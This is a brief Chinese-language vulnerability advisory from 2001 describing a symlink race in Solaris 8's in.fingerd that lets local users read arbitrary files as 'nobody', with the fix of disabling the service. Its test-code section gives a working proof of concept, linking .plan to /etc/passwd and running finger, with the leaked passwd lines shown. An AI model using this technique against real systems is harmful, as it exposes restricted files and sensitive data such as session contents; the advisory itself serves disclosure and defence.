Solaris的In.FingerD 存在符号连接漏洞发布时间:2001-05-29 更新时间:2001-05-29 严重程度:高 威胁程度:读取受限文件 错误类型:竞争条件 利用方式:服务器模式 受影响系统 Solaris 8详细描述 In.FingerD提供网络服务可以使本地用户可以访问系统信息,其中Solaris 8 下的In.FingerD存在安全漏洞,可以导致本地用户发起竞争条件漏洞,以in.fingerd的运行用户"nobody"来查看任意文件。 测试代码 $ ln -s /etc/passwd .plan $ finger -l user@example.com [localhost] Login name: user In real life: User Directory: /home/user Shell: /bin/tcsh On since May 19 20:17:04 on pts/70 from example.com Mail last read Sat May 19 13:51:12 2001 Plan: root:x:0:1:Super-User:/root:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: 也可以查看PHP下的SESSION等信息,因为这里包含不少敏感信息而且以 "nobody"用户运行。 解决方案 关闭in.fingerd服务。 相关信息 lluzar at developers.of.pl |
